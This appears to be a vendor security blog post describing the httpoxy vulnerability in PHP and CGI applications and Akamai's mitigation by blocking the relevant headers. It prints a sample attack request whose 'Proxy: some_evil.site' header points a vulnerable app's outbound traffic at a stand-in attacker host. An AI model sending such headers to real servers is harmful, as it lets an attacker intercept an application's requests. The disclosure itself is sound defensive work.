Akamai Diversity
Home > Web Security > Akamai Mitigates httpoxy Vulnerability

Akamai Mitigates httpoxy Vulnerability

Dominic Scheirlinck and the httpoxy disclosure team disclosed a vulnerability on Monday, July 18th that affects many PHP and CGI web-apps.

Many origin web applications (particularly PHP and CGI applications) unsafely trust the "HTTP_PROXY" environment variable when generating forward requests. The CGI spec (which PHP also follows) calls for the incoming header to be converted to an environment variable before executing the cgi application. The conversion specifies that "HTTP_" be prepended to the incoming header name. This means that an attacker can set the "HTTP_PROXY" environment variable for a vulnerable application by sending a "PROXY" HTTP header.

This sample request will cause "vulnerable_app.cgi" to use "some_evil.site" as a proxy for any HTTP requests that it issues.

GET /cgi-bin/vulnerable_app.cgi HTTP/1.1

Host: destination_domain.site

Proxy: some_evil.site

Potentially affected environment variables:

      HTTP_PROXY

      HTTP_PROXY_PASS

      HTTP_PROXY_USER

      HTTP_PROXY_HOST

      HTTP_PROXY_PORT

      HTTP_PROXY_PASSWORD

What should you do if you own a vulnerable website?

Akamai has moved to protect the vast majority of its customers by  blocking the HTTP headers which would alter these variables in a CGI/PHP environment

We highly recommend that, even if you are an Akamai customer, you protect your application servers immediately, as described at httpoxy.org.

Leave a comment